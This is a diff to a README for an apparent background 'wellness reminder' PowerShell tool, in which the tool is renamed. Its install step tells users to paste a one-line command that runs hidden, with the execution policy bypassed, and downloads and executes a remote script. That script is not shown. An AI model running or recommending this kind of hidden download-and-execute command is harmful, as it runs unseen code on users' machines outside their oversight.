szolll/MW1/README.md

     *   Copy the following command, paste it into the PowerShell window, and press **Enter**:

         ```powershell
-        powershell.exe -NoP -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/szolll/MW1/main/CoffeeBreak_auto.ps1') | Out-File $env:TEMP\CoffeeBreak_auto.ps1; . $env:TEMP\CoffeeBreak_auto.ps1"
+        powershell.exe -NoP -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/szolll/MW1/main/WellnessManagerSvc.ps1') | Out-File $env:TEMP\WellnessManagerSvc.ps1; . $env:TEMP\WellnessManagerSvc.ps1"
         ```

 **3. That's It!**

-The Coffee Break Reminder is now running in the background.
+Wellness Manager 1 is now running in the background.
 You can close the PowerShell window, and the service will continue to work, sending you friendly reminders throughout your day.

 ## A Note on Security